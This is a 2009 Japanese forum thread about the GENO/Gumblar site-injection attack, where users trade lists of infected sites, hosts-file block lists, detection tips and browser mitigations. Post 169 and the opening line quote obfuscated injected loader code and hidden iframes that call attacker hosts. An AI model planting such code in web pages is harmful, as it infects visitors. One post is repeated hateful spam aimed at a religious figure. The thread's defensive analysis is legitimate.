(function(ajr0d){eval(unescape(('>76ar>20a>3d>22>53cript
E>6eg>69ne>22>2c>62>3d>22>56ers>69>6f>6
142:192.168.0.774
09/05/18 19:07:54 TK3Lbxib0
結局sqlsodbc.chmを書き換えないタイプのって見つかってるのかな?
143:192.168.0.774
09/05/18 19:08:00 7k/9HGtp0
そかすまん
まぁ、fc2に感染者多いから当然とはいえちょっとだけfc2に好感を持った
144:192.168.0.774
09/05/18 19:08:43 YyHm/Ikn0
>>138
日付間違えてる
FC2は今朝のブログのメンテ日付も1日ずらして予告してらから、
社員全員ずれてるのかもだがw
145:192.168.0.774
09/05/18 19:08:50 z6TrTMtw0
今日もGENOウイルスまとめWiki重かったら、ミラー作ってもいいかね?
146:192.168.0.774
09/05/18 19:09:50 wS9NmmFE0
fc2未来に生きてるw
147:192.168.0.774
09/05/18 19:10:04 EGMN69Mk0
>>136
大丈夫ですかね少し安心しました
148:192.168.0.774
09/05/18 19:10:19 7k/9HGtp0
>>144,146
それはたぶんfc2が日本にないからだと思うんだ
URLリンク(fc2.com)
149:192.168.0.774
09/05/18 19:10:47 lbjdJxFz0
以下感染済みを確認。
kitagawadaisuke (トップページとコンサートページ以外が感染されてることを確認)
loca.zombie.jp(トップページ)
150:192.168.0.774
09/05/18 19:11:01 eOHkXG3n0
>>144
今日の日付が分かっていないfc2の社員は嫌過ぎるw
151:192.168.0.774
09/05/18 19:11:53 eOHkXG3n0
>>145
いいと思うけど、なるべく軽いのお願い。
152:192.168.0.774
09/05/18 19:13:06 +lw3mpsu0
>>134
日付間違ってるね。
153:192.168.0.774
09/05/18 19:14:01 8FweN4seO
FC2、アク解からリンク元に飛ぶ時のページにも注意書き増えたよな?
ソフォス使ってるんだけど更新出来てるのか不安なんでアバスト入れたいんだけど、競合するかな?
154:192.168.0.774
09/05/18 19:14:16 buCstTcZ0 BE:1325340285-2BP(0)
これ実行してみ
printf("%02X %02X\n",*(BYTE*)WSASend,*(BYTE*)send);
LoadLibrary("winmm.dll");
Sleep(1000);
printf("%02X %02X\n",*(BYTE*)WSASend,*(BYTE*)send);
いまの常駐仕様なら…。
155:192.168.0.774
09/05/18 19:14:57 YyHm/Ikn0
>>148
それは元から
主なユーザーが日本なのも元から
お知らせとかも普段は間違えてないんだよ
先週末くらいからおかしいの
156:192.168.0.774
09/05/18 19:17:25 Lg+8KOH80
・対処済みor対処中or元から白?
手書きブログ
livmail
スカイハイプレミアム
Carwash
成美○出版
テイアラモード
帰ってき○三日天下
烏骨鶏
株式会社まどか
リボンマジック
ALFA alfa-radio.com
TALK LIVE ANIMATED
・404
Akemi ○ayashi Website
・未確認の中の黒確定
loca.zombie.jp
・重複登録
Replica
Tシャツ通販サイト
kitagawadaisuke
主上支局-小野不由美さーち-
主上支局はカスペが見せてくれなかったので、GENOに感染してるかどうかは不明
157:192.168.0.774
09/05/18 19:17:37 FZ3y7xe60
火狐でアクセスしたら怒った!w
158:192.168.0.774
09/05/18 19:19:20 z6TrTMtw0
とりあえず登録だけした
URLリンク(wikiwiki.jp)
まだパス作成されてないからたぶん今はアクセスできないと思う
159:192.168.0.774
09/05/18 19:21:08 cA8ZyJkp0
>>95
Jane Styleは警告でない。出た人いる?
Janeのフォルダは検査除外にはしてない
Fxで開くとAVASTさん劇怒りだったのでAVASTさんは生きていると思われるが
160:192.168.0.774
09/05/18 19:21:24 wU1qChfhP
スレに挙がってる感染してるページ見て回ってるけど、
全部</head>と<body>との間なんだな
161:192.168.0.774
09/05/18 19:21:47 8GKrEP5/O
>>156
確定情報?
162:192.168.0.774
09/05/18 19:23:05 I7+FOOqT0
グーグルの画像検索で感染サイトの画像が出てもだいじょうぶですか?
163:192.168.0.774
09/05/18 19:24:41 TM5Ovwjd0
>>162
画像は別に問題ない
164:192.168.0.774
09/05/18 19:24:56 eM8L/6820
>>156
主上支局は↓
URLリンク(safebrowsing.clients.google.com)
165:192.168.0.774
09/05/18 19:26:49 z6TrTMtw0
>>164
そのサイト怪しすぎるだろ
hXXp://basesrv.net/bin/in.php
謎のURLあるし
166:192.168.0.774
09/05/18 19:28:05 ua7Ctj4Z0
●HTMLファイルの場合
<body>タグの直前に難読化されたコードが埋め込まれる。
●PHPの場合
ファイルの最初に難読化されたコードが埋め込まれる。
●JSの場合
ファイルの最後に難読化されたコードが埋め込まれる。
その他、「images」という名称のフォルダにimages.phpというファイルが生成される事も。
167:192.168.0.774
09/05/18 19:30:04 lbjdJxFz0
>>160
書こうとおもったら>>166であがってた…OTL
168:192.168.0.774
09/05/18 19:31:14 wU1qChfhP
>>161
とりあえず、loca■zombie■jp は黒
169:192.168.0.774
09/05/18 19:31:54 z6TrTMtw0
とりあえずssfos●hp●infoseek●co●jpにあったもの
document.write(unescape("%3Ciframe%20src%3D%22http%3A%2F%2F000007.ru%2Fin.cgi%3F2
rame src="hXXp://basesrv.net/bin/in.php" width=1 height=1 style="visibility:hidden"
q="=hgs`ld!rsb<iuuq;..c`rdrsw/odu.cho.ho/qiq!vheui<0!idhfiu<0!ruxmd<&whrhchmhux;iheedo&?=.hgs`ld?";w="";for(i=0;i<q.length;i++){w=w+String.from
document.write(unescape("%3Ciframe%20src%3D%22http%3A%2F%2Fipredator.ru%2F7%2Fin.cgi%3F3%22%20width%3D%2
URLリンク(theoschepens.nl)
など
アドレス少し加工済み
170:192.168.0.774
09/05/18 19:33:06 wU1qChfhP
>>166-167
サンクス
171:169
09/05/18 19:33:23 z6TrTMtw0
すまん非常に怪しいPHPカウンター(?)のURL加工忘れてた
172:192.168.0.774
09/05/18 19:34:22 fJpq/HP00
ソースチェッカー
URLリンク(so.7walker.net)
あやしいサイトはここで見れ
173:192.168.0.774
09/05/18 19:35:52 KeDzETgR0
>>111
ついさっき7.01.03.221が来た
174:192.168.0.774
09/05/18 19:36:04 YyHm/Ikn0
>>172
そこ負荷すごいらしくて、さっき使おうとしたら一時規制食らったw
175:192.168.0.774
09/05/18 19:37:38 I7+FOOqT0
>>172
GENOウイルス感染サイトのチェック増加により、サイトへのアクセスが集中しています。
なお、この新ウイルスに対してSCOのチェックフィルタは対応しておりません。
(ソースが難読化されている上に、パターンがすべて違うためです。。。)
簡単な判別方法としてはHTMLソース内JavaScript記述部分に、
「unescape」や「eval」といった文字列が含まれ、
意味不明な文字列が続いていれば危険とみなしてよいでしょう。
176:192.168.0.774
09/05/18 19:38:44 eM8L/6820
URLリンク(safebrowsing.clients.google.com)
URLリンク(safebrowsing.clients.google.com)
177:192.168.0.774
09/05/18 19:42:49 sj2fudv60
セキュ板のスレが機能していないので、こっちに書き込んでみる
------------------------------------------------------
Genoウィルスってブラウザ上からPDFを立ち上げるのか、それとも単独でAdobeReaderを立ち上げるのかどっち?
役に立つかわからんが、もし前者だとしたら、Firefox のアドオン→プラグインからAdobe Acrobatを無効化することで
ブラウザ上でPDFが開けなくなり、代わりにダウンロードウィンドウが立ち上がるので、意図しないダウンロードを予防できる気がしてきた。
178:192.168.0.774
09/05/18 19:43:08 0mxzuWZe0
聞きたいことがあるんだが
感染したやつが感染したPCでwikiとか編集したら
そのwikiって感染すんの?
179:192.168.0.774
09/05/18 19:44:21 TM5Ovwjd0
>>177
前者
>>178
それはない
180:192.168.0.774
09/05/18 19:46:23 0mxzuWZe0
>>179
ないのか
勘違いだったようだな、サンクス
181:192.168.0.774
09/05/18 19:49:33 sj2fudv60
>>179
thx
これでReaderからの侵入は確実に潰せそうだ。
182:192.168.0.774
09/05/18 19:54:42 IIOUtcG/0
>>181
何かものすごい勘違いをしているような気がしないでもない
183:192.168.0.774
09/05/18 19:57:06 +m52NSIq0
てか感染ルートってPDFとFlashだしな
よく使われる手としてJavaScript経由ってのがあるだけだし
184:192.168.0.774
09/05/18 20:00:25 DAUvXCDv0
>>・Adobe Flash Player をブラウザごとに最新(10.0.22.87)にする。
これのやり方がよくわからないので教えてもらえませんか?
ブラウザはFirefox3.0.10です
185:192.168.0.774
09/05/18 20:02:45 BZ5+cjSr0
>>122
ニュー即・・・XP厨vsVista厨状態
同人・・・・・・自分ルール押しつけで話が混乱し、ループしてる
セキュ板・・・VIPっぽい状態
186:192.168.0.774
09/05/18 20:03:37 TM5Ovwjd0
>>184
flash playerでぐぐった一番上のサイト見て見ろ
187:192.168.0.774
09/05/18 20:04:53 wU1qChfhP
>>184
IE と Firefox 別々にアクセスしてダウン→インスト
URLリンク(get.adobe.com)
インストする前に、ブラウザは終了しとく
188:192.168.0.774
09/05/18 20:05:12 duGXzOvm0
>>185
むむお主セキュ板の方にいるだろ
189:192.168.0.774
09/05/18 20:06:05 DAUvXCDv0
>>186,187
ありがとうございます
190:192.168.0.774
09/05/18 20:06:11 tFgIi2z+0
ごめん寝てた
リンク作った人だけど何かやることある?
191:192.168.0.774
09/05/18 20:06:26 KMNBjNoi0
>>184
今から入るよ。今入ったよ。ほら、半分入ってるよ。
192:192.168.0.774
09/05/18 20:08:13 rPxed0O+0
感染リンク集立てた奴、白は消した方がいいんじゃないか
っつーかパスかけてないなら俺らも消せるのか?
URLリンク(genolists.alink.uic.to)
193:192.168.0.774
09/05/18 20:08:24 7k/9HGtp0
>>190
修正済みのやつとか誤報告とか消して
194:192.168.0.774
09/05/18 20:08:27 9rsvt0n10
バスターまだ動かないんかな
他のとこは動き出したんだっけ?ノートン先生とか
195:192.168.0.774
09/05/18 20:09:04 GCzc7qM00
そろそろ言っておきたいんだけど
「GENOウイルス」って言うのは正確に説明できない(USBウィルスと同じ)言葉なので使うの止めよう
現象、対策も間違っているの多すぎ!
だからWisdom of Crowdになり得ないんだよ2chは…
196:192.168.0.774
09/05/18 20:09:33 VXjO+9fU0
JavaScriptを切るとyoutubeやニコ動などの動画が見れなくなって不便って書き込みいくつかあったけど
AdobeReaderの環境設定で「Acrobat JavaScriptを使用」のチェック外してOKしても問題なく動画見れるんですが
これってJavaScriptを切れてないってことでしょうか?
197:192.168.0.774
09/05/18 20:10:00 /sQ3yN+j0
A
1.js - javaScript無効
2.id=2(reader) - reader最新,Flash最新
3.id=10(exe) - antivirussoft対応待
B
1.IPblock - hosts,router,FW,IPfilteringsoft
2.etc - firefox,NoScript,ABP,vista
198:192.168.0.774
09/05/18 20:13:32 wU1qChfhP
>>195
間違っている思うのは、ぜひ報告してほしい
199:192.168.0.774
09/05/18 20:14:31 tFgIi2z+0
取り敢えず対策済みor誤報告用のカテゴリ作っておいた
登録されてるサイトの中で当てはまるのがあれば突っ込んでくれれば、感染確認カテゴリから削除しておくぜ
200:192.168.0.774
09/05/18 20:15:04 BZ5+cjSr0
>>188
いいえ、メインはニュー即です。向こうに間違えて書き込んじゃったの、見てますよね。
しかしNorton先生、毎度毎度細かい更新があって、専ブラが読み込んだVBSナントカには敏感に反応するのに
このスレのコードには全く反応なしですね。なんか不安になってきます。
201:192.168.0.774
09/05/18 20:15:14 eOHkXG3n0
そんなこと今から、GENOウイルスではなくて
別の名前にしろといわれても。
202:192.168.0.774
09/05/18 20:16:12 JmCcr4Q60
>>196
JavaScriptを切れてない
ブラウザ(IEやらOperaやらFireFoxやら)のJavaScriptも切るんだ
そうすっとニコ動等見れなくなる(対策としては正常)
203:192.168.0.774
09/05/18 20:16:32 EL5bXFK40
前スレの822-823
いくらJavaScriptが効いてたとはいえ
何気に最新Adobeが突破されてるのは結局どうなったんだろう
204:192.168.0.774
09/05/18 20:16:59 4I1CdU820
前スレのVISTAでの話しですが
>>951
「パスおよびファイル名が正しいか確認してください」って出て保存できない。
上書き保存だよね?
自分、常に管理者でログインしてるはずなんだけどな…
205:192.168.0.774
09/05/18 20:17:04 buCstTcZ0
GENO系って呼ぶようにはしてるけど
GENOが作ってるわけでもないが、GENOに起爆点が感染したことで、
この界隈で一気に有名になったんだな
206:192.168.0.774
09/05/18 20:17:48 XTSMt63n0
>>196
Adobe Readerはpdf形式のファイルを見るviewer
なので、Adobe Readerのjavascrpitを無効にしたら、pdf形式の脆弱性をつくケースは対応される。
他の人が言っている javascritp を切るは IE や Firefox などの ウェブブラウザーの設定のことを言っている。
で、フラッシュ動画が普通に見られてるということは、ブラウザーの設定で javascrpt が有効になったまま。
207:192.168.0.774
09/05/18 20:18:08 uRd9mOOs0
>>203
え、突破されたの?
208:192.168.0.774
09/05/18 20:18:36 9T8t/wwO0
>>204
Vista使ってないからエスパーレスだけど、ファイルが書き込み禁止とかなってない?
あるいは管理者なのに書き込み権限が無いとか(これは多分無い)
209:192.168.0.774
09/05/18 20:18:59 KMNBjNoi0
>>207
クズは黙ってろ
210:192.168.0.774
09/05/18 20:19:26 S4JQD6PZ0
創価糞学会の糞池田大作キチガイ創価の糞池田糞大作クソ公明党のクソ池田大作死ね
創価糞学会の糞池田大作キチガイ創価の糞池田糞大作クソ公明党のクソ池田大作死ね
創価糞学会の糞池田大作キチガイ創価の糞池田糞大作クソ公明党のクソ池田大作死ね
創価糞学会の糞池田大作キチガイ創価の糞池田糞大作クソ公明党のクソ池田大作死ね
創価糞学会の糞池田大作キチガイ創価の糞池田糞大作クソ公明党のクソ池田大作死ね
創価糞学会の糞池田大作キチガイ創価の糞池田糞大作クソ公明党のクソ池田大作死ね
創価糞学会の糞池田大作キチガイ創価の糞池田糞大作クソ公明党のクソ池田大作死ね
211:192.168.0.774
09/05/18 20:20:49 rPxed0O+0
>>199
じゃとりあえず>>156を
あと
306 名前:名無しさん@ゴーゴーゴーゴー![sage] 投稿日:2009/05/18(月) 18:36:14 ID:/b1kbV3H0
URLリンク(genolists.alink.uic.to)に晒されてる疑いのあるサイト検証してきたよ
ALFA …… 白 ソースチェッカーの誤反応と思われ
Tシャツ通販サイト …… 黒 感染確認
kitagawadaisuke …… 白 ソースチェッカーの誤反応と思われ
TALK LIVE ANIMATED …… 白 ソースチェッカーの誤反応と思われ
loca.zombie.jp …… 黒 感染確認
主上支局-小野不由美さーち …… 黒 感染確認 複数感染確認
管理人さん見てたら白のサイトは消して下さい
ソースチェッカーの結果鵜呑みにするのはやめたほうがいいと思う
309 名前:名無しさん@ゴーゴーゴーゴー![sage] 投稿日:2009/05/18(月) 18:46:39 ID:/b1kbV3H0
ごめん306だけど
kitagawadaisuke …… 白 ソースチェッカーの誤反応と思われ
これは間違い
TOPページは無事だがその下が全部感染してる
でももう確定済みにあがってたね
212:192.168.0.774
09/05/18 20:21:49 4I1CdU820
>>208
>ファイルが書き込み禁止とかなってない?
これを確認する方法もわからない。
誰かーVISTAの人ーーー
213:192.168.0.774
09/05/18 20:22:57 gM07vQcn0
pixivがリスト入ってるけど、誰かJavascriptの確認できた?
こちらではなかなか確認できない
214:192.168.0.774
09/05/18 20:23:44 eOHkXG3n0
2009-05-18
噂を鵜呑みにしてはいけません
Fx一般
FirefoxがGENOウィルス騒動のとばっちりを受けているようなので、基本的なことを確認しておきたい。
Firefoxの先読み機能は、Webページ内に個別の指定がある場合にだけはたらく。
ただし、より一般的な先読み機能を提供するアドオンは存在する。
仮に先読み機能が働いた場合でも、読み込んだページのスクリプトをあらかじめ実行したりはしない。
Firefox 3.5に搭載されるDNSプリフェッチ機能は、ページ自体の先読み機能とは別物。
215:192.168.0.774
09/05/18 20:24:32 nW5WlAwR0
>195
これだけ知識のある人たちが無報酬で対策を練ってくれてるってネットならではのことで、
私は凄いと思ってるけどね。
情報が錯綜しているわけだから、間違いがあっても当然だし、呼び名なんかにこだわる
必要あるのかな。
正確に説明できないって意味がよくわからないけど、とりあえず通称として流布してるん
だから、それを使うのに問題あるとも思えないんだけど・・・
216:192.168.0.774
09/05/18 20:26:20 phP+MH5H0
これまでこの攻撃についてzlkon.lvとかgumblar.cnとかmartuz.cnとか言われてるが、
どれも攻撃サーバの名前であってコロコロ変わっていく。
最近JS:Redirector-H*なんて呼び方もあるようだけど、
これは不正に挿入されたJSコードを指しているだけで攻撃の全貌を現してはいない。
一方、「GENOウィルス」という呼び方は4月の発見当初から使われていて
このキーワードで検索した場合の情報量の蓄積も馬鹿にならない。
今回の攻撃の総称として、もう日本語圏では「GENOウィルス」でいいんじゃないかと思う。
217:192.168.0.774
09/05/18 20:26:36 Uvd5wKih0
pixiv追加した人は「一部ページ」がどこなのか詳細をください
218:192.168.0.774
09/05/18 20:26:47 4ySopLDi0
スレ更新でavastが反応してチェストに入るファイルは危なくないの?
219:192.168.0.774
09/05/18 20:27:14 TM5Ovwjd0
>>213
見てみたが別に異常なさそうだが
google-analyticsで誤検知したんじゃないか
220:192.168.0.774
09/05/18 20:27:58 tFgIi2z+0
二件を対策済み、pixivを疑いに移動ー
221:192.168.0.774
09/05/18 20:28:23 TM5Ovwjd0
>>218
チェストはウィルスが入っていても大丈夫な場所
222:192.168.0.774
09/05/18 20:32:20 4ySopLDi0
>>221 回答ありがとう。えーとそのチェストに入ってるファイルをデスクトップに出しても大丈夫なのかな。
気になってるのは更新で検出されたファイルが誤検出かどうか知りたい。
223:192.168.0.774
09/05/18 20:33:44 eOHkXG3n0
908 名前:GENO[sage] 投稿日:2009/05/18(月) 20:12:02 ID:ViAG4CWw0 (PC)
幾つか感染サイトのソースをチェッカー挟んで見てみた。
正規表現検索が可能なソフトを使えばローカルでの簡易チェックが可能と思われます。
正規表現例:[Dreamweaver]
\(function\(.*?\)\{(var)*
(function(0~いくtかの文字列){var
上記で検索してヒットしたソースに覚えが無ければ怪しい。
ウィルスチェッカーが0%出したところでウィルスのソースがあったので
ツールに頼らず視認しとく方が吉と思う。
224:192.168.0.774
09/05/18 20:35:08 A6eu+XQA0
名前を使われると困る人達もいるって事だろう。
不名誉だしね。
225:192.168.0.774
09/05/18 20:35:14 TM5Ovwjd0
>>222
出すだけなら別にかまわんが
誤って実行したら知らんぞ
226:192.168.0.774
09/05/18 20:36:35 XTSMt63n0
>>212
右クリックでプロパティー
というか、
> これを確認する方法もわからない。
お前さんはWindows Update以外何もしないほうが良い
227:192.168.0.774
09/05/18 20:37:18 8osgued70
>>218
スレ更新で反応してるやつは気にしなくていいよ
頭おかしいのが反応するコード書いて喜んでるだけだから
228:192.168.0.774
09/05/18 20:37:27 4ySopLDi0
>>225 まじか・・・つまり今回はやりのコードを書き込むだけでウイルスがはいってくるのかな。
229:192.168.0.774
09/05/18 20:40:23 oH14GReB0
>>190
感染確定に入ってる一番下のreplicaと、対策済みのreplicaが重複してるんで片方消しててクレクレ
230:192.168.0.774
09/05/18 20:41:12 n99n8vmI0
>>228
んなわけなーだろ
231:192.168.0.774
09/05/18 20:41:51 lbjdJxFz0
>>127
綴り間違ってた…F-Sercureってなによ… OTL
F-SecureのDB更新されたけど、id10が対応されていない現状…OTL
id2は Exploit.Win32.Pidief.auw で対応。
232:192.168.0.774
09/05/18 20:42:26 IrQAOVFw0
いまさらちょっと聞きづらいんですが
IEよりFirefoxにしたほうが良いってよく書いてあるのはJS切り易いから?
他にも何か良いことあるのかな?
233:192.168.0.774
09/05/18 20:43:37 /U0UmsNW0
ググレカス
234:192.168.0.774
09/05/18 20:43:55 gHdwI20D0
>>228
チェストに入ったのが専ブラのスレログなら、それは問題ないんじゃね。
アフォが書き込んだ文字列に反応してるんだろ
235:192.168.0.774
09/05/18 20:45:07 zK5dEXlg0
ここはいつから質問スレになったんだろ
236:192.168.0.774
09/05/18 20:45:44 wU1qChfhP
pixivは実質白だろ。一部ページってホントどこだ?
237:192.168.0.774
09/05/18 20:46:24 enUpbFMt0
他だと基地外多いからじゃね
前スレでも見てろって感じだが
238:192.168.0.774
09/05/18 20:46:44 WzIrOxQoO
馬鹿が大量に流れてきたからだろ
239:192.168.0.774
09/05/18 20:47:29 9T8t/wwO0
*.cnで中国全部拒否出来たらいいのに・・・・
ルータもFWもこの記述出来ない
240:192.168.0.774
09/05/18 20:48:50 +m52NSIq0
そこでPeerGuardian2ですよ?
241:192.168.0.774
09/05/18 20:50:24 gHdwI20D0
初心者板にでも質問スレ立てた方がいいな
242:192.168.0.774
09/05/18 20:50:44 UniNnZ5w0
まとめ見に行きたいけど怖くて踏めない
243:192.168.0.774
09/05/18 20:51:15 kA5lVKLe0
>>232
> IEよりFirefoxにしたほうが良いってよく書いてあるのはJS切り易いから?
まぁ、そんなところ。その辺を自分で管理できるなら、IEでもいいと思うよ。
244:192.168.0.774
09/05/18 20:51:19 pmy1O3A40
>>242
まとめは管理者以外編集できないようにしてるから今は大丈夫
245:192.168.0.774
09/05/18 20:51:48 RCHjlpg60
>>242
そこまで信用できないなら解決するまでネット繋ぐなとしか言えんのだが…
246:192.168.0.774
09/05/18 20:51:50 yKeLT0rF0
リンク集どうなってんの?
帰ってき○三日天下、まだ黒いんだけど
短時間で対処&また感染したのか?
あと主上支局が二つあるよ
247:192.168.0.774
09/05/18 20:51:51 9T8t/wwO0
>>240
それ初めて聞いたから早速調べて来た
かなり便利そうだけどバスター入れてるから併用トラブル怖いんだよねえ・・・・
もうちょい調べて検討してみる、教えてくれてthx
248:192.168.0.774
09/05/18 20:52:57 +psJy0jj0
色々情報が混乱してるからではないの
調べ物で前スレとか見ても良いと悪いと両方書いてあったりと
249:192.168.0.774
09/05/18 20:53:27 4I1CdU820
>>226
どこの画面で右クリックプロパティ?
オラワガンネ
250:192.168.0.774
09/05/18 20:54:07 UniNnZ5w0
>>244
トン 今から見てきます
>>245
wikiに昨日愉快犯がいたみたいでgkbrでした
251:192.168.0.774
09/05/18 20:54:09 nup6y9oC0
>>204
951 名前:192.168.0.774[sage] 投稿日:2009/05/18(月) 14:44:33 ID:k2CI1leb0
>>945
こんなんでどうだろう。
Vistaでhostsを編集する方法
スタートメニュー→すべてのプログラム→アクセサリ→メモ帳
の上で右クリック
「管理者として実行」を選択
「ファイル」メニュー→「開く」
ファイルの種類を「テキスト文書(*.txt)」から「すべてのファイル(*.*)」に変更
C:\Windows\System32\drivers\etc\hosts
を開く
以下の行を追加し、保存終了
# GENOウイルス対策5月18日
0.0.0.0 zlkon.lv
0.0.0.0 gumblar.cn
0.0.0.0 martuz.cn
前スレから vistaでおんなじ症状だったけどこれでできたよ
252:192.168.0.774
09/05/18 20:54:30 KxPBQ8Is0
pixivのスクリプト見て回ったけどインジェクションないっぽ
253:192.168.0.774
09/05/18 20:54:40 yKeLT0rF0
>>248
URL先はソース見れば一発でわかるんだが、たいした数じゃないし
帰ってき○三日天下に至っては、avestが反応するし
254:192.168.0.774
09/05/18 20:56:53 enUpbFMt0
>>249
お前はLANケーブル引っこ抜いてろ
255:192.168.0.774
09/05/18 20:57:57 jb9+lqSe0
同 人 板 の 腐 女 子 は 帰 れ ! !
256:192.168.0.774
09/05/18 20:58:17 ua7Ctj4Z0
セキュ板より転記
538 名無しさん@お腹いっぱい。 sage 2009/05/18(月) 19:22:05
感染サイトの管理人です
サイトの改ざんは3階層目までだな
545 名無しさん@お腹いっぱい。 sage 2009/05/18(月) 19:24:40
>>538
もうサイト消しちゃった?
もし消してないなら検体にご協力してくれ
584 名無しさん@お腹いっぱい。 sage 2009/05/18(月) 19:40:04
>>545
パスを変更後該当コードだけを削除したよ
再び改ざんされるか検証中
パスを変えない場合は感染PCを起動させてない状態でも該当コード削除後1時間で改ざんされた
257:192.168.0.774
09/05/18 20:58:36 z5yUImZ90
>>249
お前にパーソナルコンピュータはまだ早い
携帯で我慢しておけ
258:192.168.0.774
09/05/18 21:00:01 tFgIi2z+0
>>246
まじか
上に書かれてた白確認リストに従ったんだけど
また感染したんかねぇ、取り敢えず黒に移しとく
259:192.168.0.774
09/05/18 21:00:06 4I1CdU820
>>251
>「管理者として実行」を選択
この項目がないんだ・・
もう、そうめん食ってウイルスの事は忘れた方がいい?
260:192.168.0.774
09/05/18 21:00:46 +m52NSIq0
前スレ951
951 名前:192.168.0.774[sage] 投稿日:2009/05/18(月) 14:44:33 ID:k2CI1leb0
>>945
こんなんでどうだろう。
Vistaでhostsを編集する方法
スタートメニュー→すべてのプログラム→アクセサリ→メモ帳
の上で右クリック
「管理者として実行」を選択
「ファイル」メニュー→「開く」
ファイルの種類を「テキスト文書(*.txt)」から「すべてのファイル(*.*)」に変更
C:\Windows\System32\drivers\etc\hosts
を開く
以下の行を追加し、保存終了
# GENOウイルス対策5月18日
0.0.0.0 zlkon.lv
0.0.0.0 gumblar.cn
0.0.0.0 martuz.cn
>>249
エクスプローラを開き、アドレスバーに「C:\Windows\System32\drivers\etc」コピペ→Enter
hostsファイルがあるので、それを右クリック→プロパティということさ☆
261:192.168.0.774
09/05/18 21:00:49 4ySopLDi0
>>230 そうなのか。
>>228 そう、このスレをjaneで更新したらavastが反応した。ログに反応する事があるんですね
262:192.168.0.774
09/05/18 21:00:52 +psJy0jj0
テンプレの
3.NoScriptの導入(Firefoxの導入)
これがよくないな
263:192.168.0.774
09/05/18 21:02:25 FTMobkHsO
そういえばオンラインスキャンって今のところ有効かどうかまだはっきりしてないのかな?
まとめwiki見た感じだとニフティのオンラインスキャンは効果ある…と考えていいのか?
264:192.168.0.774
09/05/18 21:02:31 +m52NSIq0
>>262
是非改善案を出してください。
265:192.168.0.774
09/05/18 21:02:47 kh9I2kSv0
>>259
PC窓から投げ捨てろ
266:192.168.0.774
09/05/18 21:03:16 oH14GReB0
対策法としてWiki貼ってあるサーチ系のサイト多いけど、検体送ろうぜって所は皆無だな
267:192.168.0.774
09/05/18 21:03:28 yKeLT0rF0
>>258
乙。手間かけてすまんね。
他のもあるかもしれね。
あともし対応済み確定でもうウイルス出ないなら移動より削除で良いかと
再発あるかもだから1日くらいは置いといた方が良いのかな?
268:192.168.0.774
09/05/18 21:04:24 ehqW54OZ0
>>69
これだけど
今の鯖イギリスだよね?
269:192.168.0.774
09/05/18 21:04:42 yKeLT0rF0
>>263
亜種が色々あるから効果あるのとないのとある
270:192.168.0.774
09/05/18 21:05:21 wU1qChfhP
>>256
>感染PCを起動させてない状態でも該当コード削除後1時間で改ざんされた
GENO恐ろしい子・・・
271:192.168.0.774
09/05/18 21:05:22 TM5Ovwjd0
>>266
検体はもう送ってるだろ
272:192.168.0.774
09/05/18 21:06:38 +m52NSIq0
こんなに実感が沸かず、そしてじわじわ恐怖感が
煽られるウイルス今までで初めてです。
273:192.168.0.774
09/05/18 21:06:49 4I1CdU820
>>260
>>265
有難う…とりあえずそうめん食うよ…
274:192.168.0.774
09/05/18 21:07:59 +psJy0jj0
>>265
使用してるブラウザのJSをオフでいいんじゃないの
chromeのことはわからんけど
275:192.168.0.774
09/05/18 21:10:33 wU1qChfhP
>>274
同意
hosts は補助的な対策だし、JavaScript 切った方がよっぽど有効
276:192.168.0.774
09/05/18 21:11:16 gM07vQcn0
正直感染サイトをブラックリスト化していっても埒あかないわ
PC使う人間が賢くなってJavascript実行しないようにしてくれないと。
この際みんなFirefox+Noscriptにしようぜ
IEなんて窓から投げ捨てろwww
277:192.168.0.774
09/05/18 21:11:23 mHe74bNo0
>>268
たどっていくとわかると思うが
その後にイギリスに移動していている事も書いている
278:192.168.0.774
09/05/18 21:11:57 +psJy0jj0
>>264と間違えました
279:192.168.0.774
09/05/18 21:13:00 mHe74bNo0
>>256
PC起動させてないのに改ざんって普通できないと思うんだが
1分1秒でも起動しているから改ざんされたんだろ
280:192.168.0.774
09/05/18 21:13:11 yKeLT0rF0
>>258
リンク集の人ごめん。帰ってきたはキャッシュだった\(^o^)/
本当に申し訳ないです。PC投げ捨ててくるわ……。
281:192.168.0.774
09/05/18 21:13:40 4I1CdU820
もしかして自分宛?
IEのJavaスクリプトは切ってる。
あとアクティブなんとかも切ってる。
あと、ファイルをどうたらこうたらで開く?実行する?も無効にした。
そうめんに塩こんぶ入れるとおいしいよ…
282:192.168.0.774
09/05/18 21:14:21 TM5Ovwjd0
>>279
FTPのパスだけ抜かれたんだろ
283:192.168.0.774
09/05/18 21:14:24 gHdwI20D0
1.Adobe Flash Player の最新版にアップデート
2.Adobe Acrobat Reader の最新版にアップデート
3.Adobe Acrobat Readerの JavaScript 機能OFF
4.使用しているブラウザのJavaScriptをオフにする。
(FirefoxならNoscript導入)
5.Windows Updateもやっておく
6.セキュリティ対策ソフトもパターンを最新に更新
こんなもんか?
284:192.168.0.774
09/05/18 21:15:39 KxPBQ8Is0
loca.zombie.jpはガチ黒だな
285:192.168.0.774
09/05/18 21:16:03 kh9I2kSv0
>>281
VistaならUAC切れなければ大丈夫じゃない?
一応sqlsodbc.chm開けるか確認しといたほうがいいけど
286:192.168.0.774
09/05/18 21:16:04 9T8t/wwO0
>>283
キャッシュも一旦全部消す
誤検出→誤報告とか色々ややこしいから、解析とかしようという人でもない限り消すべき
287:192.168.0.774
09/05/18 21:16:05 TTbAOLbH0
>>195
今のGENOウイルスって呼び名が、適切じゃないのは分かってるんだけど・・・
素敵すぎる対応でここまで広がる原因とまではいわんけど、きっかけの一つを作ったGENOの名を残してやりたいって感情的な思いがある
288:192.168.0.774
09/05/18 21:16:23 FYugBiBP0
Windows 95/98/ME に avast! を導入された方へ
Windows 95/98/ME では、avast! を導入しただけでは、
Webシールドに守られません。
ご使用の全Webブラウザ(2ch専ブラ)ごとに、それぞれの
通信設定で、avast! が通信のプロキシ(代理)サーバーに
なるように自分で設定する必要があります。
avast! を入れても、現在 丸裸 ですから早く設定しましょう。
設定方法は、ヘルプの「Webシールド ― プロバイダの設定」
に書かれています。
avast! を入れて、感染サイトをわざわざ見に行って、
avast! が反応しなかったと書かれていた方、ご愁傷様です。
289:192.168.0.774
09/05/18 21:16:32 FTMobkHsO
>>269
そうなのか、ありがとう
とりあえず念のためニフティオンラインスキャンやっておくよ
スキャン中はJS切れないからちょっと不安だがスキャンページとwiki以外見なければ平気かな?
290:192.168.0.774
09/05/18 21:16:34 KxPBQ8Is0
って上に書いてたスマン
291:192.168.0.774
09/05/18 21:16:37 YyHm/Ikn0
>>283
あぶないIPの遮断は?
292:192.168.0.774
09/05/18 21:16:44 mHe74bNo0
>>282
ああ改ざんされたのは鯖のデータか
